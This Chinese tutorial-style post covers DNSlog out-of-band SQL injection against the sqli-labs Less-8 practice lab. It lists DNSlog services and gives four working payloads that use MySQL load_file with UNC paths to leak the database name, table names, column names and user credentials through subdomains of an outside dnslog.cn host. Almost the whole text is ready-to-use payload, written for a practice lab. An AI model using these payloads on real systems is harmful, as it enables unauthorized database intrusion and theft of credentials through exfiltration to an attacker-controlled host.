SQL注入之dns回显注入

DNSlog外带数据注入

用到的网站

http://dnsbin.zhack.ca/

http://dnslog.cn/

http://ceye.io/

pyload:

查库

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",database(),".kkc53r.dnslog.cn\\xxx.txt")) --+

查表

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(table_name SEPARATOR'-') from information_schema.tables where table_schema='security'),".kkc53r.dnslog.cn\\xxx.txt")) --+

查列

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select group_concat(column_name SEPARATOR'-') from information_schema.columns where table_schema='security' and table_name='users'),".kkc53r.dnslog.cn\\xxx.txt")) --+

查数据(ps:子域名长度不能超过63个字符)

http://192.168.232.128/sqllabs/Less-8/?id=1' and load_file(concat("\\\\",(select concat(username,password) from users limit 0,1),".kkc53r.dnslog.cn\\xxx.txt")) --+

你可能感兴趣的:(MySQL,mysql)